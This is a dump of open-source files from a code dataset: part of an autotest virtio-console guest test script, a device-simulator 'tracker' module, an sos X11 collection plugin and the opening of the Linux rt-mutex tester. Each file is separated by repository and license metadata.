:param method: Method of read/write access.
:param cachesize: Block to receive and send.
"""
Thread.__init__(self, name="Switch")
self.in_files = in_files[0]
self.in_names = in_files[1]
self.out_files = out_files[0]
self.out_names = out_files[1]
self.exit_thread = event
self.method = method
self.cachesize = cachesize
def _none_mode(self):
"""
Read and write to device in blocking mode
"""
data = ""
while not self.exit_thread.isSet():
data = ""
for desc in self.in_files:
data += os.read(desc, self.cachesize)
if data != "":
for desc in self.out_files:
os.write(desc, data)
def _poll_mode(self):
"""
Read and write to device in polling mode.
"""
pi = select.poll()
po = select.poll()
for fd in self.in_files:
pi.register(fd, select.POLLIN)
for fd in self.out_files:
po.register(fd, select.POLLOUT)
while not self.exit_thread.isSet():
data = ""
t_out = self.out_files
readyf = pi.poll(1.0)
for i in readyf:
data += os.read(i[0], self.cachesize)
if data != "":
while ((len(t_out) != len(readyf)) and not
self.exit_thread.isSet()):
readyf = po.poll(1.0)
for desc in t_out:
os.write(desc, data)
def _select_mode(self):
"""
Read and write to device in selecting mode.
"""
while not self.exit_thread.isSet():
ret = select.select(self.in_files, [], [], 1.0)
data = ""
if ret[0] != []:
for desc in ret[0]:
data += os.read(desc, self.cachesize)
if data != "":
ret = select.select([], self.out_files, [], 1.0)
while ((len(self.out_files) != len(ret[1])) and not
self.exit_thread.isSet()):
ret = select.select([], self.out_files, [], 1.0)
for desc in ret[1]:
os.write(desc, data)
def _reconnect_none_mode(self):
"""
Read and write to device in blocking mode, close and reopen device
when it get OSError.
This is workaround for hotplugging of virtio port.
"""
# TODO: Remove port unplugging after failure from guest_worker
# when bz796048 is resolved.
data = ""
while not self.exit_thread.isSet():
data = ""
for i in xrange(len(self.in_files)):
if self.exit_thread.isSet():
break
desc = self.in_files[i]
try:
data += os.read(desc, self.cachesize)
except OSError, inst:
if inst.errno == 9:
# Wait 0.1 before spoiling output with additional
# log information.
# time.sleep(0.5)
sys.stdout.write("FD closed, readerr %s\n" % inst)
while self.in_names[i] not in virt.files:
pass
self.in_files[i] = virt.files[self.in_names[i]]
else:
sys.stdout.write("Missing device, readerr %s\n"
% inst)
_desc = desc
for item in virt.files.iteritems():
if item[1] == desc:
path = item[0]
break
for item in virt.ports.iteritems():
if item[1]['path'] == path:
name = item[0]
break
virt.close(name)
while not self.exit_thread.isSet():
try:
desc = virt._open([name])[0]
sys.stdout.write("PASS: Opened %s\n"
% name)
break
except OSError:
pass
self.in_files[self.in_files.index(_desc)] = desc
if data != "":
for i in xrange(len(self.out_files)):
if self.exit_thread.isSet():
break
desc = self.out_files[i]
written = False
while not written:
try:
if self.exit_thread.isSet():
break
os.write(desc, data)
written = True
except OSError, inst:
if inst.errno == 9:
# Wait 0.1 before spoiling output with
# additional log information.
# time.sleep(0.5)
sys.stdout.write("FD closed, writeerr %s\n"
% inst)
while self.out_names[i] not in virt.files:
pass
self.out_files[i] = virt.files[
self.out_names[i]]
else:
sys.stdout.write("Missing device, writeerr"
" %s\n" % inst)
_desc = desc
for item in virt.files.iteritems():
if item[1] == desc:
path = item[0]
break
for item in virt.ports.iteritems():
if item[1]['path'] == path:
name = item[0]
break
virt.close(name)
while not self.exit_thread.isSet():
try:
desc = virt._open([name])[0]
sys.stdout.write("PASS: Opened "
"%s\n" % name)
break
except OSError:
pass
_desc = self.out_files.index(_desc)
self.out_files[_desc] = desc
def run(self):
if (self.method == VirtioGuest.LOOP_POLL):
self._poll_mode()
elif (self.method == VirtioGuest.LOOP_SELECT):
self._select_mode()
elif (self.method == VirtioGuest.LOOP_RECONNECT_NONE):
self._reconnect_none_mode()
elif (self.method == VirtioGuest.LOOP_NONE):
self._none_mode()
else:
print "WARNIGN: Unknown mode %s, using LOOP_NONE" % self.method
self._reconnect_none_mode()
class Sender(Thread):
"""
Creates a thread which sends random blocks of data to dst port.
"""
def __init__(self, port, event, length):
"""
:param port: Destination port
:param length: Length of the random data block
"""
Thread.__init__(self, name="Sender")
self.port = port
self.exit_thread = event
self.data = array.array('L')
for _ in range(max(length / self.data.itemsize, 1)):
self.data.append(random.randrange(sys.maxint))
def run(self):
while not self.exit_thread.isSet():
os.write(self.port, self.data)
def _open(self, in_files):
"""
Open devices and return array of descriptors
:param in_files: Files array
:return: Array of descriptor
"""
f = []
for item in in_files:
path = self.ports[item]["path"]
if (path in self.files):
f.append(self.files[path])
else:
try:
self.files[path] = os.open(path, os.O_RDWR)
if (self.ports[item]["is_console"] == "yes"):
print os.system("stty -F %s raw -echo" % (path))
print os.system("stty -F %s -a" % (path))
f.append(self.files[path])
except Exception, inst:
print "FAIL: Failed to open file %s" % (path)
raise inst
return f
@staticmethod
def pollmask_to_str(mask):
"""
Conver pool mast to string
:param mask: poll return mask
"""
out = ""
if (mask & select.POLLIN):
out += "IN "
if (mask & select.POLLPRI):
out += "PRI IN "
if (mask & select.POLLOUT):
out += "OUT "
if (mask & select.POLLERR):
out += "ERR "
if (mask & select.POLLHUP):
out += "HUP "
if (mask & select.POLLMSG):
out += "MSG "
return out
def poll(self, port, expected, timeout=500):
"""
Pool event from device and print event like text.
:param file: Device.
"""
in_f = self._open([port])
p = select.poll()
p.register(in_f[0])
mask = p.poll(timeout)
maskstr = self.pollmask_to_str(mask[0][1])
if (mask[0][1] & expected) == expected:
print "PASS: Events: " + maskstr
else:
emaskstr = self.pollmask_to_str(expected)
print "FAIL: Events: " + maskstr + " Expected: " + emaskstr
def lseek(self, port, pos, how):
"""
Use lseek on the device. The device is unseekable so PASS is returned
when lseek command fails and vice versa.
:param port: Name of the port
:param pos: Offset
:param how: Relative offset os.SEEK_{SET,CUR,END}
"""
fd = self._open([port])[0]
try:
os.lseek(fd, pos, how)
except Exception, inst:
if inst.errno == 29:
print "PASS: the lseek failed as expected"
else:
print inst
print "FAIL: unknown error"
else:
print "FAIL: the lseek unexpectedly passed"
def blocking(self, port, mode=False):
"""
Set port function mode blocking/nonblocking
:param port: port to set mode
:param mode: False to set nonblock mode, True for block mode
"""
fd = self._open([port])[0]
try:
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
if not mode:
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
else:
fcntl.fcntl(fd, fcntl.F_SETFL, fl & ~os.O_NONBLOCK)
except Exception, inst:
print "FAIL: Setting (non)blocking mode: " + str(inst)
return
if mode:
print "PASS: set to blocking mode"
else:
print "PASS: set to nonblocking mode"
def __call__(self, sig, frame):
"""
Call function. Used for signal handle.
"""
if (sig == signal.SIGIO):
self.sigio_handler(sig, frame)
def sigio_handler(self, sig, frame):
"""
Handler for sigio operation.
:param sig: signal which call handler.
:param frame: frame of caller
"""
if self.poll_fds:
p = select.poll()
map(p.register, self.poll_fds.keys())
masks = p.poll(1)
print masks
for mask in masks:
self.poll_fds[mask[0]][1] |= mask[1]
def get_sigio_poll_return(self, port):
"""
Return PASS, FAIL and poll walue in string format.
:param port: Port to check poll information.
"""
fd = self._open([port])[0]
maskstr = self.pollmask_to_str(self.poll_fds[fd][1])
if (self.poll_fds[fd][0] ^ self.poll_fds[fd][1]):
emaskstr = self.pollmask_to_str(self.poll_fds[fd][0])
print "FAIL: Events: " + maskstr + " Expected: " + emaskstr
else:
print "PASS: Events: " + maskstr
self.poll_fds[fd][1] = 0
def set_pool_want_return(self, port, poll_value):
"""
Set value to static variable.
:param port: Port which should be set excepted mask
:param poll_value: Value to check sigio signal.
"""
fd = self._open([port])[0]
self.poll_fds[fd] = [poll_value, 0]
print "PASS: Events: " + self.pollmask_to_str(poll_value)
def catching_signal(self):
"""
return: True if should set catch signal, False if ignore signal and
none when configuration is not changed.
"""
ret = self.catch_signal
self.catch_signal = None
return ret
def async(self, port, mode=True, exp_val=0):
"""
Set port function mode async/sync.
:param port: port which should be pooled.
:param mode: False to set sync mode, True for sync mode.
:param exp_val: Value which should be pooled.
"""
fd = self._open([port])[0]
try:
fcntl.fcntl(fd, fcntl.F_SETOWN, os.getpid())
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
self.use_config.clear()
if mode:
self.catch_signal = True
os.kill(os.getpid(), signal.SIGUSR1)
self.use_config.wait()
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_ASYNC)
self.poll_fds[fd] = [exp_val, 0]
else:
del self.poll_fds[fd]
fcntl.fcntl(fd, fcntl.F_SETFL, fl & ~os.O_ASYNC)
self.catch_signal = False
os.kill(os.getpid(), signal.SIGUSR1)
self.use_config.wait()
except Exception, inst:
print "FAIL: Setting (a)sync mode: " + str(inst)
return
if mode:
print "PASS: Set to async mode"
else:
print "PASS: Set to sync mode"
def close(self, filepath):
"""
Close open port.
:param filepath: File to close.
"""
descriptor = None
path = self.ports[filepath]["path"]
if path is not None:
if path in self.files.keys():
descriptor = self.files[path]
del self.files[path]
if descriptor is not None:
try:
os.close(descriptor)
except Exception, inst:
print "FAIL: Closing the file: " + str(inst)
return
print "PASS: Close"
def open(self, in_file, attempts=1):
"""
Direct open devices.
:param in_file: Array of files.
:return: Array of descriptors.
"""
opened = False
for i in xrange(attempts):
try:
name = self.ports[in_file]["path"]
self.files[name] = os.open(name, os.O_RDWR)
if (self.ports[in_file]["is_console"] == "yes"):
print os.system("stty -F %s raw -echo" % (name))
opened = True
break
except Exception, exc:
print str(exc)
time.sleep(0.1)
if opened:
print "PASS: All files opened correctly. (%d)" % i
else:
print "FAIL: Failed open file %s" % name
def loopback(self, in_files, out_files, cachesize=1024,
mode=0):
"""
Start a switch thread.
(There is a problem with multiple opens of a single file).
:param in_files: Array of input files.
:param out_files: Array of output files.
:param cachesize: Cachesize.
:param mode: Mode of switch.
"""
self.ports = self._get_port_status()
in_f = self._open(in_files)
out_f = self._open(out_files)
in_files = [self.ports[item]["path"] for item in in_files]
out_files = [self.ports[item]["path"] for item in out_files]
s = self.Switch([in_f, in_files], [out_f, out_files], self.exit_thread,
cachesize, mode)
s.start()
self.threads.append(s)
sys.stdout.write("PASS: Start switch\n")
def exit_threads(self):
"""
Function end all running data switch.
"""
self.exit_thread.set()
for th in self.threads:
print "join %s" % th.getName()
th.join()
self.exit_thread.clear()
del self.threads[:]
for desc in self.files.itervalues():
os.close(desc)
self.files.clear()
print "PASS: All threads finished"
def die(self):
"""
Quit consoleswitch.
"""
self.exit_threads()
sys.exit(0)
def send_loop_init(self, port, length):
"""
Prepares the sender thread. Requires clean thread structure.
"""
self.ports = self._get_port_status()
in_f = self._open([port])
self.threads.append(self.Sender(in_f[0], self.exit_thread, length))
print "PASS: Sender prepare"
def send_loop(self):
"""
Start sender data transfer. Requires senderprepare run first.
"""
self.threads[0].start()
print "PASS: Sender start"
def send(self, port, length=1, mode=True, is_static=False):
"""
Send a data of some length
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
:param is_static: False = generates $length long block (mode=0)
True = generates 4096 long block (faster, mode=1)
"""
in_f = self._open([port])
data = ""
writes = 0
if not is_static:
while len(data) < length:
data += "%c" % random.randrange(255)
try:
writes = os.write(in_f[0], data)
except Exception, inst:
print inst
else:
while len(data) < 4096:
data += "%c" % random.randrange(255)
if mode:
while (writes < length):
try:
writes += os.write(in_f[0], data)
except Exception, inst:
print inst
if writes >= length:
print "PASS: Send data length %d" % writes
else:
print ("FAIL: Partial send: desired %d, transferred %d" %
(length, writes))
def recv(self, port, length=1, bfr=1024, mode=True):
"""
Receive a data of arbitrary length.
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
"""
in_f = self._open([port])
recvs = ""
try:
recvs = os.read(in_f[0], bfr)
except Exception, inst:
print inst
if mode:
while (len(recvs) < length):
try:
recvs += os.read(in_f[0], bfr)
except Exception, inst:
print inst
if len(recvs) >= length:
print "PASS: Recv data length %d" % len(recvs)
else:
print ("FAIL: Partial recv: desired %d, transferred %d" %
(length, len(recvs)))
def clean_port(self, port, bfr=1024):
in_f = self._open([port])
ret = select.select([in_f[0]], [], [], 1.0)
buf = ""
if ret[0]:
buf = os.read(in_f[0], bfr)
print ("PASS: Rest in socket: ") + str(buf[:10])
class VirtioGuestNt(VirtioGuest):
"""
Test tools of virtio_ports.
"""
LOOP_NONE = 0
LOOP_POLL = 0 # TODO: Use SELECT instead of NONE (poll not supp. by win)
LOOP_SELECT = 0 # TODO: Support for Select
def _get_port_status(self, in_files=[]):
"""
Get info about ports.
:param in_files: Array of input files.
:return: Ports dictionary of port properties
"""
ports = {}
for in_file in in_files:
port = {}
port['path'] = "\\\\.\\%s" % in_file[0]
port['name'] = in_file[0]
port['is_console'] = in_file[1]
ports[in_file[0]] = port
return ports
def init(self, in_files):
"""
Init and check port properties.
"""
# This only sets the ports names and paths
# TODO: symlinks are sometimes missing, use /dev/vport%dp%d"
self.ports = self._get_port_status(in_files)
# Check if all ports really exists
remove = []
for item in self.ports.iteritems():
port = item[1]
try:
hFile = win32file.CreateFile(port['path'], 0, 0, None,
win32file.OPEN_EXISTING,
win32file.FILE_ATTRIBUTE_NORMAL,
None)
win32file.CloseHandle(hFile)
except win32file.error:
remove.append(port['name'])
print "Fail to open port %s" % port['name']
for name in remove:
del(self.ports[name])
# Check if in_files count and system port count matches
# TODO: Not all devices are listed
# TODO: Find the way to list all devices
if remove:
print "FAIL: Not all ports are present, check the log."
return
"""
reg = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, "System")
reg = _winreg.OpenKey(reg, "CurrentControlSet")
reg = _winreg.OpenKey(reg, "Services")
reg = _winreg.OpenKey(reg, "VirtioSerial")
reg = _winreg.OpenKey(reg, "Enum")
virtio_port_count = _winreg.QueryValueEx(reg, "Count")[0]
if virtio_port_count != len(self.ports):
print ("FAIL: Number of ports (%d) doesn't match the number"
" of ports in registry (%d)"
% (len(self.ports), virtio_port_count))
return
"""
print "PASS: Init and check virtioconsole files in system."
def close(self, filepath):
"""
Close open port.
:param filepath: File to close.
"""
hFile = None
path = self.ports[filepath]["path"]
if path is not None:
if path in self.files.keys():
hFile = self.files[path]
del self.files[path]
if hFile is not None:
try:
win32file.CloseHandle(hFile)
except win32file.error, inst:
print "FAIL: Closing the file: " + str(inst)
return
print "PASS: Close"
def _open(self, in_files):
"""
Open devices and return array of descriptors
:param in_files: List of port names
:return: Array of descriptor
"""
f = []
for name in in_files:
path = self.ports[name]["path"]
if path in self.files:
f.append(self.files[path])
else:
ret = self.open(name)
if ret:
raise ret
f.append(self.files[path])
return f
def open(self, name):
"""
Direct open devices.
:param name: Port name.
:return: 0 on success
"""
path = self.ports[name]['path']
try:
self.files[path] = win32file.CreateFile(path,
win32file.GENERIC_WRITE |
win32file.GENERIC_READ,
0,
None,
win32file.OPEN_EXISTING,
win32file.FILE_ATTRIBUTE_NORMAL,
None)
except win32file.error, exc_detail:
print "%s\nFAIL: Failed open file %s" % (str(exc_detail), name)
return exc_detail
print "PASS: All files opened correctly."
def exit_threads(self):
"""
Function end all running data switch.
"""
self.exit_thread.set()
for th in self.threads:
print "join"
th.join()
self.exit_thread.clear()
del self.threads[:]
for desc in self.files.itervalues():
win32file.CloseHandle(desc)
self.files.clear()
print "PASS: All threads finished"
class Switch(Thread):
"""
Thread that sends data between ports.
"""
def __init__(self, in_files, out_files, event,
cachesize=1024, method=0):
"""
:param in_files: Array of input files.
:param out_files: Array of output files.
:param method: Method of read/write access.
:param cachesize: Block to receive and send.
"""
Thread.__init__(self, name="Switch")
self.in_files = in_files
self.out_files = out_files
self.exit_thread = event
self.method = method
self.cachesize = cachesize
def _none_mode(self):
"""
Read and write to device in blocking mode
"""
data = ""
while not self.exit_thread.isSet():
data = ""
for desc in self.in_files:
ret, _data = win32file.ReadFile(desc, self.cachesize)
if ret:
msg = ("Error occurred while receiving data, "
"err=%s, read=%s" % (ret, _data))
print "FAIL: " + msg
raise IOError(msg)
data += _data
if data != "":
for desc in self.out_files:
ret, _data = win32file.WriteFile(desc, data)
if ret:
msg = ("Error occurred while sending data, "
"err=%s, sentlen=%s" % (ret, _data))
print "FAIL: " + msg
raise IOError(msg)
def run(self):
self._none_mode()
class Sender(Thread):
"""
Creates a thread which sends random blocks of data to dst port.
"""
def __init__(self, port, event, length):
"""
:param port: Destination port
:param length: Length of the random data block
"""
Thread.__init__(self, name="Sender")
self.port = port
self.exit_thread = event
self.data = array.array('L')
for _ in range(max(length / self.data.itemsize, 1)):
self.data.append(random.randrange(sys.maxint))
def run(self):
while not self.exit_thread.isSet():
if win32file.WriteFile(self.port, self.data)[0]:
msg = "Error occurred while sending data."
print "FAIL: " + msg
raise IOError(msg)
def send_loop_init(self, port, length):
"""
Prepares the sender thread. Requires clean thread structure.
"""
in_f = self._open([port])
self.threads.append(self.Sender(in_f[0], self.exit_thread, length))
print "PASS: Sender prepare"
def send_loop(self):
"""
Start sender data transfer. Requires senderprepare run first.
"""
self.threads[0].start()
print "PASS: Sender start"
def send(self, port, length=1, mode=True, is_static=False):
"""
Send a data of arbitrary length
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
:param is_static: False = generates $length long block (mode=0)
True = generates 4096 long block (faster, mode=1)
"""
port = self._open([port])[0]
data = ""
writes = 0
if not is_static:
try:
while len(data) < length:
data += "%c" % random.randrange(255)
_ret, _len = win32file.WriteFile(port, data)
if _ret:
msg = ("Error occurred while sending data, "
"err=%s, sentlen=%s" % (_ret, _len))
raise IOError(msg)
writes = _len
except Exception, inst:
print inst
else:
while len(data) < 4096:
data += "%c" % random.randrange(255)
if mode:
try:
while (writes < length):
_ret, _len = win32file.WriteFile(port, data)
if _ret:
msg = ("Error occurred while sending data, err=%s"
", sentlen=%s, allsentlen=%s" % (_ret, _len,
writes))
raise IOError(msg)
writes += _len
except Exception, inst:
print inst
if writes >= length:
print "PASS: Send data length %d" % writes
else:
print ("FAIL: Partial send: desired %d, transferred %d" %
(length, writes))
def recv(self, port, length=1, buflen=1024, mode=True):
"""
Receive a data of arbitrary length.
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
"""
port = self._open([port])[0]
recvs = ""
try:
_ret, _data = win32file.ReadFile(port, buflen)
if _ret:
msg = ("Error occurred while receiving data, "
"err=%s, read=%s" % (_ret, _data))
raise IOError(msg)
recvs = _data
except Exception, inst:
print inst
if mode:
while (len(recvs) < length):
try:
_ret, _data = win32file.ReadFile(port, buflen)
if _ret:
msg = ("Error occurred while receiving data, "
"err=%s, read=%s, allread=%s" % (_ret, _data,
len(recvs)))
raise IOError(msg)
except Exception, inst:
print inst
if len(recvs) >= length:
print "PASS: Recv data length %d" % len(recvs)
else:
print ("FAIL: Partial recv: desired %d, transferred %d" %
(length, len(recvs)))
def is_alive():
"""
Check is only main thread is alive and if guest react.
"""
if ((os_linux and (threading.activeCount() == 2)) or
((not os_linux) and (threading.activeCount() == 1))):
print ("PASS: Guest is ok no thread alive")
else:
threads = ""
for thread in threading.enumerate():
threads += thread.name + ", "
print ("FAIL: On guest run thread. Active thread:" + threads)
def guest_exit():
"""
quit/finish/exit this script
"""
global exiting
exiting = True
def compile_script():
"""
Compile virtio_console_guest.py to speed up.
"""
import py_compile
py_compile.compile(__file__, "%so" % __file__)
print "PASS: compile"
sys.exit(0)
def worker(virt):
"""
Worker thread (infinite) loop of virtio_guest.
"""
global exiting
print "PASS: Daemon start."
p = select.poll()
p.register(sys.stdin.fileno())
while not exiting:
d = p.poll()
if (d[0][1] == select.POLLIN):
out = raw_input()
try:
exec out
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "On Guest exception from: \n" + "".join(
traceback.format_exception(exc_type,
exc_value,
exc_traceback))
print "FAIL: Guest command exception."
elif (d[0][1] & select.POLLHUP):
time.sleep(0.5)
def sigusr_handler(sig, frame):
pass
class Daemon:
"""
Daemonize guest
"""
def __init__(self, stdin, stdout, stderr):
"""
Init daemon.
:param stdin: path to stdin file.
:param stdout: path to stdout file.
:param stderr: path to stderr file.
"""
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
@staticmethod
def is_file_open(path):
"""
Determine process which open file.
:param path: Path to file.
:return: [[pid,mode], ... ].
"""
opens = []
pids = os.listdir('/proc')
for pid in sorted(pids):
try:
int(pid)
except ValueError:
continue
fd_dir = os.path.join('/proc', pid, 'fd')
try:
for filepath in os.listdir(fd_dir):
try:
p = os.path.join(fd_dir, filepath)
link = os.readlink(os.path.join(fd_dir, filepath))
if link == path:
mode = os.lstat(p).st_mode
opens.append([pid, mode])
except OSError:
continue
except OSError, e:
if e.errno == 2:
continue
raise
return opens
def daemonize(self):
"""
Run guest as a daemon.
"""
try:
pid = os.fork()
if pid > 0:
return False
except OSError, e:
sys.stderr.write("Daemonize failed: %s\n" % (e))
sys.exit(1)
os.chdir("/")
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError, e:
sys.stderr.write("Daemonize failed: %s\n" % (e))
sys.exit(1)
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'w')
se = file(self.stderr, 'w')
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', 0)
return True
def start(self):
"""
Start the daemon
:return: PID of daemon.
"""
# Check for a pidfile to see if the daemon already runs
openers = self.is_file_open(self.stdout)
rundaemon = False
if len(openers) > 0:
for i in openers:
if i[1] & stat.S_IWUSR:
rundaemon = True
openers.remove(i)
if len(openers) > 0:
for i in openers:
os.kill(int(i[0]), 9)
time.sleep(0.3)
# Start the daemon
if not rundaemon:
if self.daemonize():
self.run()
def run(self):
"""
Run guest main thread
"""
global virt
global exiting
virt = VirtioGuestPosix()
slave = Thread(target=worker, args=(virt,))
slave.start()
signal.signal(signal.SIGUSR1, sigusr_handler)
signal.signal(signal.SIGALRM, sigusr_handler)
while not exiting:
signal.alarm(1)
signal.pause()
catch = virt.catching_signal()
if catch:
signal.signal(signal.SIGIO, virt)
elif catch is False:
signal.signal(signal.SIGIO, signal.SIG_DFL)
if catch is not None:
virt.use_config.set()
print "PASS: guest_exit"
sys.exit(0)
def main():
"""
Main function for OS Linux with infinite loop to catch signal from system.
"""
stdin = "/tmp/guest_daemon_pi"
stdout = "/tmp/guest_daemon_po"
stderr = "/tmp/guest_daemon_pe"
for f in [stdin, stdout, stderr]:
try:
os.mkfifo(f)
except OSError, e:
if e.errno == 17:
pass
daemon = Daemon(stdin,
stdout,
stderr)
daemon.start()
d_stdin = os.open(stdin, os.O_WRONLY)
d_stdout = os.open(stdout, os.O_RDONLY)
d_stderr = os.open(stderr, os.O_RDONLY)
s_stdin = sys.stdin.fileno()
s_stdout = sys.stdout.fileno()
s_stderr = sys.stderr.fileno()
pid = filter(lambda x: x[0] != str(os.getpid()),
daemon.is_file_open(stdout))[0][0]
print "PASS: Start"
while 1:
ret = select.select([d_stderr,
d_stdout,
s_stdin],
[], [], 1.0)
if s_stdin in ret[0]:
os.write(d_stdin, os.read(s_stdin, 1))
if d_stdout in ret[0]:
os.write(s_stdout, os.read(d_stdout, 1024))
if d_stderr in ret[0]:
os.write(s_stderr, os.read(d_stderr, 1024))
if not os.path.exists("/proc/" + pid):
sys.exit(0)
os.close(d_stdin)
os.close(d_stdout)
os.close(d_stderr)
def main_nt():
"""
Main function for Windows NT with infinite loop.
"""
global virt
global exiting
virt = VirtioGuestNt()
print "PASS: Start"
sys.stdout.flush()
while not exiting:
try:
exec raw_input()
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "On Guest exception from: \n" + "".join(
traceback.format_exception(exc_type,
exc_value,
exc_traceback))
print "FAIL: Guest command exception."
sys.stdout.flush()
print "PASS: guest_exit"
sys.exit(0)
if __name__ == "__main__":
if (len(sys.argv) > 1) and (sys.argv[1] == "-c"):
compile_script()
if os_linux: # Linux
main()
else: # Windows
main_nt()
| gpl-2.0 |
DevicePilot/synth | synth/devices/tracker.py | 1 | 5816 | """
tracker
=====
Tracks a target value in a controlled way. Can be used to simulate patterns of e.g. heating or cooking etc.
Configurable parameters::
{
output_property : "temp" (or whatever)
min_value : Minimum value of output
max_value : Maximum value of output
max_value_twosigma : Error in max value (static random number per device). Will never be bigger than +/- this amount
noise : Ongoing noise added to value (varies slowly)
precision : Precision of output (e.g. 1 for integers, 10 for decades)
opening_times : ["Mo-Fr 09:00-12:00", "Mo-Su"] The opening times which drive activity
smoothing_alpha : 0..1 (smaller means tracks slower, 1 means tracks with no smoothing)
period : Period of output, as ISO8601 period (e.g. "PT15M" for every 15 minutes")
randomness_property Name of the property to use to get randomness (so if for example you want all devices at one location to share randomness, refer to the 'location' property here)
}
Device properties created::
{
<output_property>
}
"""
import random
import logging
import time
import isodate
from math import sin, pi
from .device import Device
from common import opening_times
DEFAULT_PERIOD = "PT15M"
DEFAULT_VARIABILITY_BY_DEVICE = 0.2
MINS = 60
HOURS = MINS * 60
DAYS = HOURS * 24
def hash_to_0_1(v, n):
# v is a value to derive a random number from (can be anything at all - a number, a string etc.)
# n is an integer which says which random number we want, e.g. 0 is the first random number, 1 is the second
r = random.Random()
r.seed(v)
r.random()
r.random()
for i in range(n):
r.random()
result = r.random()
return result
def frequency_noise(t):
h = 2 * pi * t/HOURS # Convert seconds into hours, and radians
v = sin(h) + sin(h/1.3) + sin(h/2.7) + sin(h/7.7) + sin(h/13.3) + sin(h/29.3) + sin(h/47)
v = (v + 1.0) / 2.0
return v # Return 0..1
class Tracker(Device):
def __init__(self, instance_name, time, engine, update_callback, context, params):
super(Tracker,self).__init__(instance_name, time, engine, update_callback, context, params)
args = params["tracker"]
self.randomness_property = args.get("randomness_property", None)
self.my_random = random.Random() # We use our own random-number generator, one per variable per device
if self.randomness_property is None:
self.my_random.seed(self.get_property("$id")) # Seed each device uniquely
else:
self.my_random.seed(hash(self.get_property(self.randomness_property)))
open_t = args.get("opening_times")
if isinstance(open_t, list):
open_t = open_t[self.my_random.randrange(len(open_t))] # Choose one of the options
self.set_property("opening_times", open_t)
self.opening_times = opening_times.parse(open_t)
self.output_property = args.get("output_property", "tracker")
self.min_value = args.get("min_value", 0)
mx = args.get("max_value", 100)
mxs = args.get("max_value_twosigma", 0)
self.max_value = random.gauss(mx, mxs/2)
self.max_value = min(self.max_value, mx+mxs)
self.max_value = max(self.max_value, mx-mxs)
self.noise_level = args.get("noise", 0)
self.precision = args.get("precision", 1)
self.smoothing_alpha = args.get("smoothing_alpha", 0.1)
self.polling_interval = isodate.parse_duration(args.get("period", DEFAULT_PERIOD)).total_seconds()
self.tracking_value = None
self.time_offset = None
self.set_property(self.output_property, self.current_value())
self.engine.register_event_in(self.polling_interval, self.tick_update, self, self)
def comms_ok(self):
return super(Tracker,self).comms_ok()
def external_event(self, event_name, arg):
super(Tracker,self).external_event(event_name, arg)
pass
def close(self):
super(Tracker,self).close()
# Private methods
def tick_update(self, _):
self.set_properties({
self.output_property : self.current_value(),
"open" : opening_times.is_open(self.engine.get_now(), self.opening_times)
})
self.engine.register_event_in(self.polling_interval, self.tick_update, self, self)
def fixed_random(self, v, n): # TODO: This "delay generation of randomness until our randomness_property has been set" behaviour is no longer required, now that we can specify init order in scenario files using "name:N" format
if v is not None:
return v
if self.property_exists(self.randomness_property):
return hash_to_0_1(self.get_property(self.randomness_property), n)
return None # We can't operate
def current_value(self):
self.time_offset = self.fixed_random(self.time_offset, 0)
now = self.engine.get_now() + (self.time_offset - 0.5) * 60 * 60 * 2 # Add +/- 1h of shift to opening times
open = opening_times.is_open(now, self.opening_times)
if open:
a = 1.0
else:
a = 0.0
target = self.min_value + a * (self.max_value - self.min_value)
if self.tracking_value is None:
self.tracking_value = target
else:
self.tracking_value = self.tracking_value * (1-self.smoothing_alpha) + target * self.smoothing_alpha
fnoise = frequency_noise(self.engine.get_now() + hash(self.get_property("$id"))) # Each device has different frequency noise phase
result = self.tracking_value + fnoise * self.noise_level
return int(result / self.precision) * self.precision
| mit |
codificat/sos | sos/plugins/x11.py | 4 | 1225 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
class X11(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""X windowing system
"""
plugin_name = 'x11'
profiles = ('hardware', 'desktop')
files = ('/etc/X11',)
def setup(self):
self.add_copy_spec([
"/etc/X11",
"/var/log/Xorg.*.log",
"/var/log/XFree86.*.log",
])
self.add_forbidden_path("/etc/X11/X")
self.add_forbidden_path("/etc/X11/fontpath.d")
# vim: et ts=4 sw=4
| gpl-2.0 |
fefifofum/android_kernel_bq_maxwell2plus | scripts/rt-tester/rt-tester.py | 11005 | 5307 | #!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
